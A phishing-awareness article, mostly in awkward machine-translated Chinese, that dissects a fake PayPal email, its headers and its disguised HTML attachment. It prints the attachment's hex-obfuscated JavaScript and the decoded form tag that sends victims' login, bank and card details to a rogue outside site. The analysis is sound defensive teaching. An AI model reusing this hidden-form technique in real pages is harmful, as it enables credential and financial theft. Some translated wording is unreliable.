In today’s world where everyone’s information is online, phishing is one of the most popular and devastating online attacks, because you can always clean a virus, but if your banking details are stolen, you’re in trouble. Here’s a breakdown of one such attack we received.

不要認為只有你的銀行資訊才是重要的：畢竟，如果有人控制了你的帳戶登入，他們不僅知道該帳戶中包含的資訊，而且很有可能相同的登入資訊會被用於其他各種帳戶。如果他們洩露了你的電子郵件帳戶，他們可以重置你的所有其他密碼。

因此，除了保持強大和不同的密碼，你必須時刻警惕偽裝成真品的虛假電子郵件。雖然大多數網路釣魚嘗試是業餘的，一些是相當有說服力的，所以重要的是要了解如何識別他們在表面水平，以及他們如何在引擎蓋下工作。

阿西拉普圖片

什麼是一目瞭然(in plain sight)？

我們的示例電子郵件與大多數網路釣魚嘗試一樣，“通知”您貝寶帳戶上的活動，在正常情況下，這將是令人震驚的。因此，行動的要求是透過提交你能想到的每一條個人資訊來驗證/恢復你的賬戶。同樣，這是相當公式化的。

當然也有例外，幾乎每一封網路釣魚和詐騙郵件都會直接在郵件中載入紅旗。即使文字是令人信服的，你通常可以發現許多錯誤散落在整個郵件正文，這表明該郵件是不合法的。

訊息正文

乍一看，這是我見過的最好的網路釣魚郵件之一。這裡沒有拼寫或語法錯誤，而且逐字逐句都是按照你的預期來讀的。但是，當您更仔細地檢查內容時，可以看到一些危險訊號。

• “Paypal”–正確的大小寫是“Paypal”（大寫P）。您可以看到訊息中使用了這兩種變體。公司對他們的品牌非常謹慎，所以像這樣的東西能否透過打樣過程是值得懷疑的。
• “允許ActiveX”-有多少次你見過像Paypal這樣規模的合法網路企業使用只在一個瀏覽器上工作的專有元件，特別是當它們支援多個瀏覽器時？當然，在外面的某個地方有公司這麼做，但這是個危險訊號。
• 注意這個詞在頁邊空白處與段落正文的其餘部分沒有對齊。即使我把窗戶拉長一點，它也不能正確地包裹或隔開。
• “貝寶！“–感嘆號前的空格看起來很尷尬。只是另一個怪癖，我肯定不會在一個合法的電子郵件。
• “PayPal-帳戶更新表格.pdf.htm–為什麼Paypal會附加一個“PDF”，尤其是當他們可以連結到他們網站上的一個頁面時？另外，他們為什麼要把HTML檔案偽裝成PDF呢？這是其中最大的危險。

訊息頭

當您檢視訊息頭時，會出現更多的紅色標誌：

• 發件人地址為[email protected]。
• 找不到收件人地址。我沒有把它刪掉，它根本不是標準訊息頭的一部分。通常一家有你名字的公司會對你的郵件進行個性化設定。

附件

當我開啟附件時，您可以立即看到佈局不正確，因為它缺少樣式資訊。再說一次，當貝寶可以簡單地在他們的網站上給你一個連結的時候，為什麼要用電子郵件傳送一個HTML表單呢？

注意：我們使用了Gmail內建的HTML附件檢視器，但是我們建議你不要開啟騙子的附件。從未。永遠不會。他們經常包含漏洞，將安裝特洛伊木馬在您的電腦上竊取您的帳戶資訊。

再向下滾動一點，你可以看到這個表單不僅要求我們的貝寶登入資訊，但銀行和信用卡資訊以及。有些影象被破壞了。

很明顯，這種網路釣魚的企圖是一蹴而就。

技術故障

雖然很明顯這是一個網路釣魚的企圖，但我們現在要分析一下電子郵件的技術組成，看看能找到什麼。

附件中的資訊

首先要看附件表單的HTML原始碼，它將資料提交到偽站點。

快速檢視原始碼時，所有連結都顯示為有效，因為它們指向貝寶網“或”paypalobjects.com“都是合法的。

現在我們來看看Firefox在頁面上收集的一些基本頁面資訊。

如您所見，一些圖形是從域中提取的“blessedtobe.com網站”, “好健康藥房網“和”圖片-上傳.de“而不是合法的貝寶域名。

郵件頭中的資訊

接下來我們將看看原始的電子郵件訊息頭。Gmail透過郵件上的Show Original選單選項提供這一功能。

檢視原始郵件的標題資訊，可以看到此郵件是使用outlookexpress6編寫的。我懷疑PayPal的員工中是否有人透過過時的電子郵件客戶端手動傳送這些訊息。

現在檢視路由資訊，我們可以看到傳送者和中繼郵件伺服器的IP地址。

“使用者”IP地址是原始發件人。快速查詢IP資訊，我們可以看到傳送IP在德國。

當我們看到中繼郵件伺服器的(郵件.itak.at)，IP地址我們可以看到這是一個基於奧地利的ISP。我懷疑貝寶直接透過奧地利的ISP傳送電子郵件，因為他們有一個龐大的伺服器場，可以很容易地處理這項任務。

資料到哪裡去了？

因此，我們已經明確確定這是一封網路釣魚郵件，並收集了一些有關郵件來源的資訊，但您的資料是從哪裡傳送的呢？

要看到這一點，我們必須先將HTM附件儲存到桌面上，然後在文字編輯器中開啟。滾動瀏覽它，除了看到一個可疑的Javascript塊外，其他一切看起來都井然有序。

開啟最後一塊Javascript的完整原始碼，我們看到：

<script language=”JavaScript” type=”text/javascript”> // Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM var i,y,x=”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”;y=”;for(i=0;i<x.length;i+=2){y+=unescape(‘%’+x.substr(i,2));}document.write(y); </script>

每當你看到一個巨大的亂七八糟的字串似乎隨機字母和數字嵌入在一個Javascript塊，它通常是可疑的東西。檢視程式碼，變數“x”被設定為這個大字串，然後被解碼為變數“y”。變數“y”的最終結果將作為HTML寫入文件。

由於大字串由數字0-9和字母a-f組成，因此很可能透過簡單的ASCII到十六進位制轉換進行編碼：

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

轉換為：

<form name=”main” id=”main” method=”post” action=”http://www.dexposure.net/bbs/data/verify.php”>

這並不是一個巧合，這解碼成一個有效的HTML表單標籤，傳送結果不是貝寶，而是一個流氓網站。

此外，當您查看錶單的HTML原始碼時，您將看到此表單標記不可見，因為它是透過Javascript動態生成的。如果有人只是簡單地檢視附件的生成源（正如我們之前所做的那樣），而不是直接在文字編輯器中開啟附件，那麼這是一種隱藏HTML實際操作的聰明方法。

在違規網站上快速執行whois，我們可以看到這是一個託管在流行web主機1和1上的域。

最突出的是域使用可讀的名稱（與類似“dfh3”的名稱相反）sjhskjhw.net網站）並且該域已註冊4年。正因為如此，我相信這個域名被劫持，並作為一個棋子在這個網路釣魚企圖。

玩世不恭是很好的辯護

說到安全上網，有點玩世不恭是沒有壞處的。

雖然我確信示例電子郵件中有更多的危險訊號，但我們上面指出的是我們在幾分鐘的檢查後看到的指標。假設，如果郵件的表層100%地模仿了它的合法副本，那麼技術分析仍然可以揭示它的真實本質。這就是為什麼能夠同時檢查你能看到和看不到的東西是重要的。